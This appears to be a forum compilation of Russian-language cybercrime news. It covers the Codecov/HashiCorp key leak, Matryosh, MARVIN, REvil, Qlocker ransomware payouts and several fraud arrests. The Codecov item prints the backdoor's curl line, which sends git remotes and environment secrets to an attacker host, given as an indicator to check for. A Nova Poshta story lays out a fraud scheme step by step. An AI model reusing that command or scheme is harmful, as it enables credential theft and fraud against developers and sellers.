По данным Интерпола, до того, как полиция обнаружила и ликвидировала группировку злоумышленников, им удалось выманить у жертв не менее $47 000. Полицейским удалось отследить 34 случая сексуального вымогательства и арестовать 12 подозреваемых
Расследование проводилось совместными усилиями Интерпола и полиции Гонконга и Сингапура. Специалисты отмечают, что в последние годы случаи сексуального вымогательства огромных денежных средств участились.
Эксперты рекомендуют пользователям не стесняться обращаться в полицию, если они стали жертвами сексуального вымогательства и не платить злоумышленникам деньги.
Компания HashiCorp, известная разработкой открытых инструментариев Vagrant, Packer, Nomad и Terraform, объявила об утечке закрытого GPG-ключа, используемого для создания цифровых подписей, верифицирующих релизы. Атакующие, получившие доступ к GPG-ключу, потенциально могли внести скрытые изменения в продукты HashiCorp, заверив их корректной цифровой подписью. При этом компания заявила, что в ходе проведённого аудита следов попыток внесения подобных модификаций не выявлено.
В настоящее время скомпрометированный GPG-ключ отозван и вместо него введён в обиход новый ключ. Проблема затронула только верификацию при помощи файлов SHA256SUM и SHA256SUM.sig, и не коснулась формирования цифровых подписей для Linux-пакетов DEB и RPM, поставляемых через releases.hashicorp.com, а также механизмы подтверждения выпусков для macOS и Windows (AuthentiCode).
Утечка произошла из-за использования в инфраструктуре скрипта Codecov Bash Uploader (codecov-bash), предназначенного для загрузки coverage-отчётов из систем непрерывной интеграции. В ходе атаки на компанию Codecov в указанный скрипт был скрыто внедрён бэкдор, через который была организована отправка паролей и ключей шифрования на сервер злоумышленников.
Для взлома инфраструктуры Codecov атакующие воспользовались ошибкой в процессе создания Docker-образа, позволявшей извлечь данные для доступа к GCS (Google Cloud Storage), необходимые для внесения изменений в скрипт Bash Uploader, распространявшийся с сайта codecov.io. Изменения были внесены ещё 31 января, два месяца оставались незамеченными и позволяли злоумышленникам извлекать информацию, хранимую в окружениях систем непрерывной интеграции клиентов. При помощи добавленного вредоносного кода злоумышленники могли получить информацию о тестируемом Git-репозитории и всех переменных окружения, в том числе включающих токены, ключи шифрования и пароли, передаваемые в системы непрерывной интеграции для организации доступа к коду приложений, хранилищам и сервисам, таким как Amazon Web Services и GitHub.
Кроме прямого вызова скрипт Codecov Bash Uploader использовался в составе других загрузчиков, таких как Codecov-action (Github), Codecov-circleci-orb и Codecov-bitrise-step, пользователи которых также подвержены проблеме. Всем пользователям codecov-bash и связанных с ним продуктов рекомендовано провести аудит своих инфраструктур, а также же поменять пароли и ключи шифрования. Проверить наличие бэкдора в скрипте можно по наличию в нём строки
Code:Copy to clipboard
curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http://<IP-сервера-атакующих>/upload/v2 || true
• Source: [https://discuss.hashicorp.com/t/hcs...ty-event-and-hashicorp-gpg- key-exposure/23512](https://discuss.hashicorp.com/t/hcsec-2021-12-codecov- security-event-and-hashicorp-gpg-key-exposure/23512)
Специалисты китайской компании Qihoo 360 обнаружили новый DDoS-ботнет Matryosh, который состоит из Android-устройств, доступных в интернете через ADB (Android Debug Bridge).
Хотя по умолчанию ADB отключен на большинстве устройств на Android, некоторые гаджеты все же поставляются с включенным ADB (чаще всего на порту 5555). В итоге ADB уже давно является известным источником проблем для смартфонов, телевизоров, приставок и других «умных» девайсов, работающих под управлением Android. К примеру, ранее отладочными функциями ОС злоупотребляли такие вредоносы, как Ares, Trinity, Fbot и ADB.Miner.
Теперь исследователи пишут, что Matryosh отличается от других подобных ботнетов тем, что использует Tor для сокрытия своих управляющих серверов, а для получения адреса этого самого сервера применяется сложный многоуровневый процесс, который и дал имя ботнету – по аналогии с матрешкой.

По информации Qihoo 360, за разработкой этой малвари может стоять та же хакерская группа, которая в 2019 году создала ботнет Moobot, а в 2020 году — ботнет LeetHozer. Оба эти вредоноса применялись для организации DDoS-атак, равно как и Matryosh, который способен устраивать атаки с использованием TCP, UDP и ICMP.
Источник: xakep.ru/2021/02/04/matryosh/
Сотрудники УБК ГУ МВД России по г. Санкт-Петербургу и Ленинградской области задержали местного жителя. Он подозревается в дистанционном мошенничестве.
«По предварительным данным, с мая 2023 года злоумышленник и его сообщники размещали объявления на различных торговых интернет-площадках о продаже электроинструментов. В связи с тем, что товар предлагался по цене ниже рыночной, он пользовался высоким спросом. После того как клиент вводил свои данные и подтверждал сделку, на его электронную почту приходил договор купли- продажи. В нём указывались реквизиты банковской карты для оплаты товара. После получения денег продавец удалял переписку и переставал выходить на связь с покупателем», – рассказала официальный представитель МВД России Ирина Волк.
В результате оперативно-розыскных мероприятий полицейские при силовой поддержке сотрудников Росгвардии задержали подозреваемого. В ходе обыска по месту его жительства изъяты смартфоны, банковские и сим-карты, ноутбук и другие предметы, имеющие доказательственное значение.
Следователем СУ УМВД России по Калининскому району г. Санкт-Петербурга возбуждено уголовное дело по признакам преступления, предусмотренного частью 2 статьи 159 УК РФ. Фигуранту избрана мера пресечения в виде домашнего ареста.
«Также аферист подозревается в создании не менее девяти фишинговых сайтов в Интернете. На данный момент установлено, что по фактам его криминальной деятельности в других регионах Российской Федерации возбуждено еще 10 уголовных дел.
В настоящее время проводятся оперативно-розыскные мероприятия, направленные на установление других участников противоправной деятельности», – сообщила Ирина Волк.
• Video: https://rutube.ru/video/2a9a5b6c22395af21edfade96962d642/?r=plemwd
Старший инженер по качеству в команде безопасности QE BaseOS в Red Hat Хуберт Карио показал, что многие программные реализации схемы заполнения PKCS#1 v1.5 для обмена ключами RSA, которые ранее считались устойчивыми к широко известной атаке Даниэля Блейхенбахера, на самом деле уязвимы.
В 1998 году Блейхенбахер показал, что клиент сервера SSL/TLS может использовать информацию, полученную из ответов сервера об ошибках, чтобы узнать достаточно о заполнении и расшифровать защищенное сообщение.
Уязвимость появлялась неоднократно, в последний раз в 2017 году, когда исследователи безопасности обнаружили, что по крайней мере 8 IT-поставщиков и открытых проектов были уязвимы для вариации оригинальной атаки Блейхенбахера. Исследователи назвали свою атаку ROBOT.
В статье Карио говорится, что атаки в стиле Блейхенбахера на протокол RSA все еще возможны и что уязвимые реализации распространены. Карио назвал свою атаку MARVIN. По сути, отправляя специально созданные шифртексты RSA на сервер, который использует PKCS#1 v1.5, и измеряя время, необходимое для обработки сообщений, можно в конечном итоге прочитать целевой открытый текст.
Карио рекомендует прекратить использование шифрования RSA PKCS#1 v1.5, так как затрагиваются только серверы, реализующие шифрование RSA. Большинство современных клиентов, по его словам, полагаются на Elliptic Curve Diffie Hellman.
Карио выявил по крайней мере 7 затронутых реализаций, некоторые из которых подтвердили исправления, но, по его мнению, большинство криптографических реализаций RSA PKCS#1 v1.5 всё ещё уязвимы.
Затронутые реализации:
• OpenSSL (уровень TLS) – Синхронизация Oracle в расшифровке RSA ( CVE-2022-4304 );
• OpenSSL (уровень API) – Сделать API расшифровки RSA безопасным для использования с заполнением PKCS#1 v1.5 (без CVE);
• GnuTLS (уровень TLS) – уязвимость связана с тем, что время ответа на неправильные шифртексты RSA в ClientKeyExchange отличается от времени ответа шифртекстов с правильным заполнением PKCS#1 v1.5 ( CVE-2023-0361 );
• НСС (уровень TLS) – улучшено постоянное время в операциях RSA. Ошибка была неполностью исправлена в версии 3.61 – реализация ещё уязвима ( CVE-2023-4421 );
• pyca/cryptography – требуется исправление уровня OpenSSL ( CVE-2020-25659 );
• M2Crypto – требуется исправление уровня OpenSSL ( CVE-2020-25657 );
• OpenSSL-ibmca – Исправления для RSA PKCS#1 v1.5 и заполнения OAEP в версии 2.4.0 (без CVE).
Те, кто заинтересован в тестировании своих систем, могут воспользоваться [скриптом](https://github.com/tlsfuzzer/tlsfuzzer/blob/master/scripts/test- bleichenbacher-timing-pregenerate.py) Карио для тестирования серверов TLS и соответствующими [инструкциями](https://tlsfuzzer.readthedocs.io/en/latest/timing- analysis.html) . Карио также отметил, что недостаток не ограничивается только RSA. Любая реализация, использующая общее целочисленное выполнение, столкнется с теми же проблемами.
Парламентарии уточнили перечень норм УК, по которым могут конфисковать имущество, полученное в результате нарушений закона.
Депутаты во втором чтении одобрили законопроект о конфискации имущества, которое получили в результате киберпреступлений. Речь о поправках к ст. 104.1 УК (законопроект № 238005-8 «О внесении изменений в статью 104-1 Уголовного кодекса Российской Федерации»). В первоначальной версии новеллы законодатели предложили дополнить эту норму новым списком преступлений, по которым ее можно применять. К ним будут относиться:
- неправомерный доступ к компьютерной информации (ст. 272 УК);
- создание, использование и распространение вредоносных компьютерных программ
(ст. 273 УК);
- нарушение правил эксплуатации средств хранения и обработки цифровой
информации (ст. 274 УК);
- неправомерное воздействие на критическую информационную инфраструктуру РФ
(ст. 274.1 УК).
Ко второму чтению законопроект скорректировали. А именно, внесли уточнения о ст. 272 УК. Конфисковать имущество, полученное в результате совершения преступления из этой статьи, смогут только в случае, если оно повлекло крупный ущерб или его совершили с корыстной заинтересованностью (ч. 2 ст. 272 УК), его совершили группой лиц по предварительному сговору или организованной группой либо его совершило лицо с использованием служебного положения (ч. 3 ст. 272 УК) или же если преступление повлекло тяжкие последствия или создало угрозу их наступления (ч. 4 ст. 272 УК).
Еще уточнение добавили относительно ст. 274 УК. При совершении этого преступления конфискация будет грозить только в случае, когда деяние повлекло тяжкие последствия или создало угрозу их наступления.
source: sozd.duma.gov.ru/bill/238005-8
«Коммерсант» сообщает, что расследование уголовного дела предполагаемых членов группировки хакеров REvil, задержанных ФСБ по наводке спецслужб США, практически зашло в тупик.
Дело в том, что американские власти отказались от дальнейшего сотрудничества с Россией, и обвинить подозреваемых смогли только в махинациях с банковскими картами двух живущих в США мексиканцев. По данным издания, адвокаты планируют использовать это для освобождения своих клиентов.
Напомню, что деятельность хак-группы REvil прекратилась в январе 2022 года, после того как ФСБ объявило об аресте 14 человек, связанных с хак-группой, а по 25 адресам в Москве, Санкт- Петербурге, Ленинградской и Липецкой областях прошли обыски. При этом сообщалось, что «основанием для розыскных мероприятий послужило обращение компетентных органов США».
Тогда Тверской суд Москвы заключил под стражу восемь предполагаемых участников хак-группы. Всем им были предъявлены обвинения в приобретении и хранении электронных средств, предназначенных для неправомерного осуществления перевода денежных средств, совершенных организованной группой (ч. 2 ст. 187 УК РФ). Наказание по данной статье — до семи лет лишения свободы.
Журналисты пишут, что защита одного из обвиняемых по делу REvil Дмитрия Коротаева обратилась к заместителю главы Совбеза России Олегу Храмову. Около месяца назад он признался «Российской газете», что расследование деятельности предполагаемых хакеров фактически приостановлено по вине бывших партнеров российского Совбеза из Совета национальной безопасности США.
По словам Храмова, после состоявшихся летом 2021 года телефонных переговоров президентов России и США под эгидой их совбезов была создана международная рабочая группа по вопросам кибербезопасности и в рамках начавшегося сотрудничества партнеры попросили россиян «немедленно арестовать главного хакера» — ресторатора из Санкт-Петербурга Даниила Пузыревского. Российские спецслужбы, по его словам, сначала провели «собственное кропотливое расследование» и только после этого в январе 2022 года привлекли к ответственности «всю банду киберпреступников», включая Пузыревского.
Таким образом россияне, по мнению генерала Храмова, свою часть договора выполнили, а американцы к этому времени «так и не прислали обещанные дополнительные доказательства» причастности задержанных к преступлениям и даже «не подтвердили ущерб от вымогательства».
«Более того, они уведомили нас, что в одностороннем порядке выходят из переговорного процесса и закрывают канал связи», — посетовал чиновник.
Click to expand...
По словам Игоря Вагина, заведующего адвокатской консультацией №185 Межреспубликанской коллегии адвокатов, вопреки прозвучавшим ранее громким заявлениям ФСБ о ликвидации международного «хакерского оргпреступного сообщества REvil», пока Следственному департаменту МВД удалось обвинить восьмерых предполагаемых участников хак-группы только в незаконном приобретении, хранении и использовании электронных средств, предназначенных для неправомерного перевода денежных средств (ч. 2 ст. 287 УК РФ).
Как следует из полученного следствием заключения специалистов АО «Компания объединенных кредитных карточек», жертвами хакеров стали двое граждан США и, предположительно, родственники мексиканского происхождения. По версии следствия с их карт обвиняемые дистанционно украли некую сумму денег, потратив ее на приобретение товаров в интернет-магазинах США через систему Mail order — Telephone order, позволяющую покупателю расплачиваться с продавцом по электронным средствам связи. При этом ни самих потерпевших, ни данных о нанесенном им ущербе у следствия, отмечает защита, нет, и разыскать их теперь уже вряд ли получится.
Игорь Вагин и его коллега из адвокатского агентства «Альянс» Мосюрцентра Евгений Крылов рассказали представителю Совбеза, что возможная преступная деятельность группы внутри России даже не обсуждалась, а в «уголовном деле REvil» до сих пор нет потерпевших и даже не указан нанесенный обвиняемыми ущерб. Из-за отсутствия информации, по версии защиты, следствие фактически стоит на месте. Как пояснил защитник Крылов, Дмитрия Коротаева за четыре месяца содержания в СИЗО ни разу не допросили.
По мнению Игоря Вагина, теперь передача в суд уголовного дела без потерпевших и ущерба заведомо бесперспективна. По этой же причине правоохранители вряд ли смогут добиться в суде обращения в доход государства активов обвиняемых по делу, состоящих в общей сложности из 600 000 долларов, 500 000 евро, 20 автомобилей премиум-класса и биткоинов на сумму 426 млн рублей.
Вагин полагает, что «разумным выходом из этой ситуации была бы сделка обвиняемых с Генпрокуратурой», однако аппарате Совбеза комментировать обращение адвокатов отказались, лишь сообщив, что в рабочую группу по кибербезопасности входят представители Генпрокуратуры, СКР, ФСБ, МВД, а также других ведомств.
преступления
Глава государства также отметил, что правительство работает над расширением мер экономической поддержки
МОСКВА, 5 марта. /ТАСС/. Президент РФ Владимир Путин поддержал идею отказа от уголовного преследования за экономические преступления, особенно если возмещен ущерб.
Глава государства в субботу на встрече с женщинами летного состава российских авиакомпаний отметил, что правительство России работает над расширением мер экономической поддержки, в том числе это касается снятия различных ограничений на предпринимательскую деятельность и либерализации уголовного законодательства.
"Например, я считаю, я поддерживаю, в принципе такое решение уже принято, [что] нужно избавить людей от угрозы уголовного преследования за экономические преступления, тем более если возмещен ущерб", - сказал Путин.
Он также высказался о налоговых нарушениях. "Что касается налоговых преступлений, да, конечно, правонарушения недопустимы. Но мы согласились с тем, что уголовные дела в этом случае могут быть возбуждены только по материалам налоговой службы. Мы безусловно будем это делать, пойдем по этому пути", - подчеркнул президент.
По его словам, для людей, занимающихся бизнесом, "это чрезвычайно важно". "Честно говоря, давно задают представители бизнеса вопросы подобного рода. Вот я думаю, что они услышат и соответствующим образом это оценят", - заключил глава государства.
В целом, по его мнению, в РФ нужна максимальная экономическая свобода для бизнеса в ответ на текущую ситуацию. "Я считаю, что в тех условиях, в которых мы сейчас находимся, выходом может быть только одно: максимальная экономическая свобода для людей, которые занимаются бизнесом", - резюмировал Путин.
В ночь с 4 на 5 июня неизвестные взломали криптовалютный обменник bithub.im и похитили около 5 млн рублей. На сегодняшний день около половины от суммы ущерба возмещена пострадавшим. Об этом ForkLog сообщили представители мониторингового сервиса BestChange.ru.
По предварительным данным, в ночь инцидента злоумышленники обошли систему автоматической защиты мониторинга и протоколы действий модераторов, после чего перехватили управление сервисом.
«Взломщикам в том числе удалось отключить направляемые администратору обменника через Telegram уведомления о заявках на обмен, а также полностью удалить информацию о заявках на обмен, поступавших с 00:00 по 08:00 МСК 5 июня. Администрация bithub.im была вынуждена отключить сервис», – рассказал управляющий партнер юридической фирмы Digital Rights Center Саркис Дарбинян, представляющей интересы обменного пункта.
Представители bithub.im сообщили BestChange о факте взлома. Аккаунт обменника на мониторинговом сервисе приостановили.
Позже администрация bithub.im заявила, что более семи часов доступ к управлению обменником находился у злоумышленников. Все средства, которые поступили в этот период на обменник, были получены не администрацией сервиса, а неизвестными третьими лицами.
По данному факту открыто уголовное дело и начата доследственная проверка.
«Деяния, совершенные неустановленными лицами либо группой лиц могут подпадать под признаки состава преступлений, предусмотренных ст. 272 УК РФ «Неправомерный доступ к компьютерной информации», ст. 273 УК РФ «Создание, использование и распространение вредоносных компьютерных программ», а также ст. 159.6 УК РФ «Мошенничество в сфере компьютерной информации»», — прокомментировал Саркис Дарбинян.
В ходе независимого расследования BestChange определил возможные слабые места в защите хостинга и взломанного сервиса.
«На основании полученных данных усовершенствованы механизмы проверки подозрительных операций, а также аномального поведения для обменных пунктов с некруглосуточным обслуживанием. Разработаны рекомендации для других обменных сервисов, их владельцы проинформированы о возможном несовершенстве системы безопасности хостингового центра сервиса reg.ru», – добавили представители мониторингового сервиса.
С 5 августа при содействии пожелавших остаться неизвестными инвесторов BestChange инициировал первую волну выплат пострадавшим. На текущий момент возмещено уже 2,1 млн рублей.
Стороны продолжают работу над установлением всех обстоятельств взлома и устранением последствий.
Заключенный из Сумской колонии разработал план, как нажиться за счет интернет- торговцев, при помощи вмешательства в работу электронной системы «Новой Почты». Обладая острым умом и большим количеством свободного времени, он проанализировал алгоритмы работы системы, связанные с работой личных электронных кабинетов клиентов, возможностью управления посылками и движением денежных средств, поступающих от получателей товаров.
Также криминальный талант изучил условия авторизации, регистрации и доступа к личным кабинетам клиентов, в результате чего выявил недостатки в обеспечении конфиденциальности и безопасности работы указанной системы, и разработал алгоритм несанкционированного доступа к личным кабинетам, с целью дальнейшего завладения денежными средствами продавцов, которые пересылают товары с формой оплаты «наложенный платеж».
Используя свой авторитет в тюремной среде, мужчина отобрал себе верных сообщников, которых четко проинструктировал и распределил между ними роли в преступном плане. Одна из этих ролей досталась женщине, которая должна была стать «бухгалтером» всего предприятия. Находясь на воле, она подыскивала и вербовала дропов, оформляла на них банковские карты, решала все вопросы с банками и обналичивала деньги.
Детально проработанный план мошенничества включал следующие этапы:
Раздобыть смартфоны с доступом к интернету.
Поиск интернет-торговцев (физлица, ЧП, юр.лица).
Создание фиктивных аккаунтов покупателей на торговых интернет-площадках.
Оформление фиктивных заказов наложенным платежом.
Созвон с торговцами от имени сотрудников «Новой Почты».
Поиск дропов.
Подмена данных в системе НП, путем изменения формы оплаты «наложенный платеж» на безналичный платеж через банк, с указанием (или заменой уже существующих) реквизитов на номера подконтрольных группировке карт дропов. В результате, деньги, уплоченные порядочными покупателями торговцам, отправлялись на счета мошенников.
Перевод полученных мошенническим путем денег на подконтрольные карты с последующей обналичкой.
Дележка прибыли в оговоренных долях, включая часть, которая направлялась в «общак».
Приведем первый эпизод, в качестве типичного примера данной схемы.
Организатор выбрал будущую жертву среди продавцов на сайте Prom.ua: торговца запчастями для грузовиков. Он сделал недорогой заказ на отделение в городе Прилуки, не собираясь его выкупать.
После этого, сообщник, задача которого была представляться по телефону сотрудником Новой Почты, перезвонил продавцу и сообщил, что клиент хочет оформить переадресацию посылки – курьерской доставкой по месту жительства. «Сейчас вы получите СМС-код, который нужно сообщить нам», - говорил он.
Получив код, он передавал его организатору, который при помощи этого кода авторизировался в системе НП при помощи приложения на смартфоне. Далее произвел подмену платежных реквизитов, заменив данные в кабинете продавца на подконтрольные мошенникам карты.
С этого момента, все нормальные заказы, которые продавец отправлял через Новую Почту наложенным платежом, оплачивались обычными клиентами в пользу мошенников. Аналогичным образом преступники поступили и с другими потерпевшими, в том числе, торговцами с маркетплейса «Розетка».
Когда с деньги продавцов стали исчезать, поднялся переполох и было возбуждено уголовное дело № 12020220540001751 в ЕРДР. Действия мошенников были квалифицированы правоохранителями, как мошенничество, совершенное с применением электронно-вычислительных технологий (ст. 190 УК), а также несанкционированное вмешательство в работу компьютерных систем, приведшее к утечке данных (ст. 361 УК Украины).
Поскольку личные счета «бухгалтерши» также фигурировали в цепочке отмывания денег, спустя некоторое время следствие установило ее личность, предъявило подозрение и специальным постановлением суда она была направлена в следственный изолятор.
Организатора группировки также перевели из колонии в СИЗО для проведения дальнейших следственных действий. Сейчас следствие продолжается, правоохранители пытаются выяснить точное количество потерпевших и размер нанесенного ущерба.
На прошлой неделе мы предупреждали о том, что пользователей сетевых хранилищ Qnap атакует новый шифровальщик Qlocker. Эта малварь проникает на устройства благодаря недавно исправленным критическим багам, а затем помещает все файлы пользователя в защищенные паролем архивы с расширением .7z. За расшифровку данных злоумышленники требуют заплатить 0,01 биткоина (примерно 557 долларов на момент начала атак), и это совсем немного по современным меркам, когда хакеры вымогаю у компаний миллионы долларов.

По информации издания Bleeping Computer, тактика злоумышленников оправдала себя: всего за пять дней хакеры успели взломать и зашифровать более тысячи уязвимых устройств. Так как Qlocker использует фиксированный набор биткоин- адресов, через которые проходят выкупы жертв, журналисты смогли понаблюдать за платежами.
Еще на прошлой неделе ИБ-специалист Джек Кейбл нашел в малвари ошибку, которая позволяла пользователям бесплатно спасти свои файлы. Дело в том, что жертвы могли попросить идентификатор биткоин-транзакции у другого пострадавшего, который уже заплатил выкуп, и немного изменить его. Такие измененные идентификаторы все равно срабатывали на сайте злоумышленников, и жертвы получали пароль для расшифровки своих файлов.
Этот баг быстро закрыли, но исследователь успел собрать десяток биткоин- адресов преступников. Еще 10 собрали сами журналисты. В общей сложности через эти кошельки прошли выкупы на сумму 5,25735623 биткоина. Эта сумма эквивалентна примерно 281 000 долларов США по текущему курсу. Таким образом, примерно 525 жертв, уже заплатили злоумышленникам.
Кошелек| Платежи в биткоинах
---|---
34vbPQLgGZwKG2FikitGU6QR7K25aB6Shh| 0.55216220
37m57HiP5rPceopgEWF9sM58CkzaDFYtaU| 0.14021317
3Ekwztte7oWR1odC1eKeL2Va4cpBuGXPgU| 0.09962125
3EPBKN3bcax81U3MdKYUhMC1fzFEFGPC6E| 0.10915462
3EvCKQ38y8ePUwM4w49XWVtAK7KhYbmeMH| 0.34801656
3FvLioiqF2TrQgZ9zRMdd7QUfc2hTjKZfL| 0.08951304
3FXVLv8TmcHNmnfwLfc5g7f2a32xp3XugW| 0.38088464
3G6fbWX6At9uRzKf6kwS6R6pn5EQ8UsxKY| 0.16983215
3GfAJxhUen3oqb4sDDnPmXyhs5mDboHbyG| 0.46134513
3JRdPjB8U3nfDqQHzTqw9yYra49Gsd8Rar| 0.40133268
3KmK5z4CAvn3aL4Q8F2gWbhuPRy9ZmEurN| 0.29910901
3Kywg92E877KUWmyaeeLNSXFc5bqBvFbAm| 0.48277236
3LLzycFNFh7mDsqRhfknfGBa6TKq6HcfwS| 0.31901320
3Lp1NkJHYsmFRBfM3ggoWsS1PF5hXxrwrD| 0.32386846
3PDfzkTnD1E7gB7peZ2prRyDxjQ1BhqcV1| 0.14020000
3PunvFGpVWLX7PNAoT3bMDbPQU2QQW4kxN| 0.15954000
3Q8WmjQyFs1EKCdu415t2P9cxY7AbqorPd| 0.40031185
3EWRngsRDhCxMHtKxeK6k9kX3pyWZSA2YB| 0.13081244
3Gwz3yVmrGr5AqmUrAS8H2QQaPz2v9Rhpx| 0.15965435
3JtUAz4aKUrjcBK47ocdv52tTJkriat1nx| 0.08999912
Издание отмечает, что выкупы продолжают поступать, и прибыть хакеров наверняка еще увеличится.
Напомню, что для защиты от Qlocker пользователям нужно как можно скорее обновить Multimedia Console, Media Streaming Add-on и Hybrid Backup Sync на своих устройствах, а также загрузить последнюю версию Malware Remover и проверить систему на наличие вредоносов.
Источник: xakep.ru/2021/04/26/qlocker-profit/
Деньги должны пойти на усиление инфраструктуры кибербезопасности.
Предложенный президентом США Джо Байденом план бюджета на 2022 финансовый год предусматривает выделение $750 млн государственным организациям, пострадавшим в результате атаки на SolarWinds. Деньги должны пойти на усиление инфраструктуры кибербезопасности.
Предложение Байдена поступило после того, как компания Microsoft предупредила о том, что стоящие за атакой на SolarWinds возобновили свою активность.
Предложенные президентом $750 млн являются дополнением к $500 млн, выделенным пострадавшим правительственным организациям, в частности Госдепартаменту и Министерству финансов, на усиление безопасности сразу же после сообщений об атаках.
Предложенный план бюджета предусматривает увеличение финансирования кибербезопасности федеральных гражданский организаций на 14% (по сравнению с текущим финансовым годом) – до $9,8 млрд. Кроме того, предлагается выделить $15 млн недавно созданному управлению директора по кибербезопасности Белого дома и $20 млн – новому Фонду реагирования и восстановления после кибератак (Cyber Response and Recovery Fund).
Байден также предложил на $110 млн увеличить финансирование двухмиллиардного Агентства кибербезопасности и безопасности инфраструктуры (Cybersecurity and Infrastructure Security Agency, CISA), которому уже выделено $2 млрд.
Хотя для окончательного принятия бюджетного плана требуется его одобрение Конгрессом, он является ярким отображением приоритеты администрации Байдена. Какие конкретно меры безопасности будут финансироваться из бюджета, в документе не уточняется, но подчеркивается, что приоритетной задачей будет снижение рисков и уменьшение влияния атак наподобие атаки SolarWinds.
В январе 2021 года крупный производитель сетевого оборудования и IoT- устройств, компания Ubiquiti Networks, разослал своим клиентам электронные письма с уведомлением о хакерской атаке. Тогда сообщалось, что неизвестные злоумышленники могли получить доступ к информации пользователей UI.com, а жертв просили изменить пароли и включить двухфакторную аутентификацию.
На этой неделе известный ИБ-журналист и исследователь Брайан Кребс опубликовал статью, в которой он цитирует анонимного информатора, близкого к расследованию инцидента. Информатор назвал случившееся "катастрофическим", а также поделился копией письма, которое было направлено в европейские органы по защите данных. В документе Ubiquiti Networks обвиняют в сокрытии данных о серьезности случившегося.
Аноним говорит, что еще в декабре 2020 года неизвестный хакер сумел взломать административный аккаунт компании в Amazon Web Services (AWS) и приступил к загрузке исходного кода компании, установке малвари, а также получил доступ к данным клиентов. Когда в Ubiquiti Networks обнаружили атаку и удалили один из бэкдоров злоумышленника, тот потребовал выкуп в размере 50 биткоинов и за эти деньги пообещал рассказать, где спрятан второй бэкдор, молчать о взломе и не «сливать» исходные коды, которые он украл у компании.
Компания отказалась платить выкуп, самостоятельно обнаружила и удалила второй бэкдор, сбросила все учетные данные сотрудников и в итоге выпустила январское письмо, информировавшее об атаке.
Теперь производитель опубликовал новое заявление, в котором отреагировал на информацию Кребса и раскрыл некоторые детали случившегося. В частности, в компании подтвердили, что Ubiquiti Networks стала жертвой попытки вымогательства. Но более ничего. Официальные лица не подтверждают кражу исходных кодов, более серьезные масштабы атаки и отрицают хищение информации клиентов.
«Злоумышленник, который безуспешно пытался вымогать у компании деньги, угрожая слить украденный исходный код и определенные учетные данные, никогда не заявлял, что имел доступ к какой-либо информации о клиентах», — пишут в компании.
Click to expand...
Кроме того, в заявление не затронут еще один важный нюанс, о котором говорил источник Кребса: что у компании не было никакой системы логгинга, и сотрудники даже не смогли определить, к чему именно получил доступ хакер.
Опасения относительно того, что хакер мог похитить сертификаты и файлы, позволяющие получить доступ к пользовательским устройствам Ubiquiti, так же не удостоились комментариев.
Единственное важное заявление, которое сделала теперь компания, гласит, что у них есть «проработанные доказательства того, что злоумышленник был хорошо знаком с облачной инфраструктурой [Ubiquiti Networks]».
Источник: xakep.ru/2021/04/01/ubiquiti-networks-leak-and-hack/
Киберполицейские Волынской области совместно с работниками следствия и уголовного розыска, при процессуальном руководстве Нововолынского отдела Владимирской окружной прокуратуры провели обыски у правонарушителя, который в социальных сетях размещал сообщение о сборе средств на лечение военнослужащего.
С 2022 года правонарушитель размещал фиктивные объявления в социальной сети Facebook, относительно сбора средств на лечение больных детей и прохождения реабилитации раненых военнослужащих, в результате чего неравнодушные граждане перечислили более 250 тысяч гривен.
28 июня киберполицейские провели санкционированный обыск с участием работников уголовного розыска, следственного отдела ОП № 1 (г. Нововолынск) Владимирского районного отдела полиции Главного управления Национальной полиции Волынской области в рамках уголовного производства, начатого по ч. 3 ст. 190 Уголовного кодекса Украины, по месту жительства 32-летнего жителя Нововолынска, в результате которого изъяли мобильные телефоны с которых злоумышленник осуществлял публикации, а также банковские карточки на которые осуществлялись зачисление средств и ноутбу
При осмотре мобильных телефонов установлено, что злоумышленник одновременно использовал 21 учетную запись в социальном приложении Facebook для сбора средств.
Его задержали в порядке статьи 208 Уголовного процессуального кодекса Украины и в настоящее время решается вопрос об объявлении о подозрении по ч. 3 ст. 190 (Мошенничество) Уголовного кодекса Украины и избрании меры пресечения - содержание под стражей.
По словам ФБР, киберугроза от Китая больше, чем от всех крупных стран вместе взятых.
Директор ФБР Кристофер Рэй заявил, что количество хакеров, работающих в интересах Китая, больше, чем у США в 50 раз.
По словам Рэя, даже если каждый из «киберагентов» и «разведаналитиков» ФБР будет заниматься только китайской киберугрозой, китайских хакеров все равно будет больше.
Рэй также подчеркнул, киберугроза от Китая настолько масштабна, что она превышает объём киберугроз от всех других крупных стран вместе взятых. Кроме того, по словам эксперта, киберугрозы для США также исходят от России, Ирана и КНДР. В связи с этим, необходимо усилить меры по защите кибербезопасности и предотвращению кибератак со стороны этих стран.
Рэй также отметил, что Китай использует киберугрозы для кражи интеллектуальной собственности, в том числе технологических разработок и бизнес-секретов. Это наносит ущерб американским компаниям и экономике в целом.
Директор ФБР считает, что необходимо усилить международное сотрудничество в борьбе с киберугрозами и подчеркнул, что «ФБР готово работать с партнерами из других стран для предотвращения кибератак».
Ранее законодатели Конгресса США представили законопроект , который потребует от Пентагона значительно расширить сотрудничество в области кибербезопасности с Тайванем для защиты острова от киберугроз со стороны Китая. Закон уполномочит министра обороны США проводить киберучения с Тайванем, защищать военную инфраструктуру и системы острова, а также устранять злонамеренную цифровую активность против острова.
source: abcnews.go.com/Politics/chinese-cyber-threat-unparalleled-fbi- director/story?id=98914869
27 марта в сети Cosmos запустился проект Noble, который станет официальной платформой для запуска стейблкоина USDC в сетях и протоколе кроссчейн- коммуникаций Cosmos (IBC). Согласно блогу, вскоре более 50 блокчейнов с поддержкой IBC смогут получить доступ к стабильным монетам от компании- эмитента Circle, выпущенным на Noble. Сообщается, что интеграция с использованием IBC будет простой, безопасной и бесшовной.
Прокуратура Краснодара направила в Прикубанский районный суд уголовное дело на жителя города. Его обвиняют в мошенничестве с техникой Apple на сумму более 60 млн руб., сообщает пресс-служба прокуратуры Краснодарского края.
30-летний мужчина в 2019 году вводил в заблуждение жителей Краснодара. Он предлагал им продажу мобильных телефонов и другой электронной техники известного бренда по заниженной рыночной цене. В итоге он получил от пяти жителей Кубани более 60 млн руб., однако свои обязательства не выполнил.
Мужчину обвиняют по ч. 3, 4 ст. 159 УК РФ (мошенничество, совершенное в крупном и особо крупном размерах). Свою вину мошенник не признал, ущерб не возместил. По данной статье ему грозит до 10 лет лишения свободы, а также дополнительные наказания в виде ограничения свободы и штрафа.
source: kommersant.ru/doc/5644046
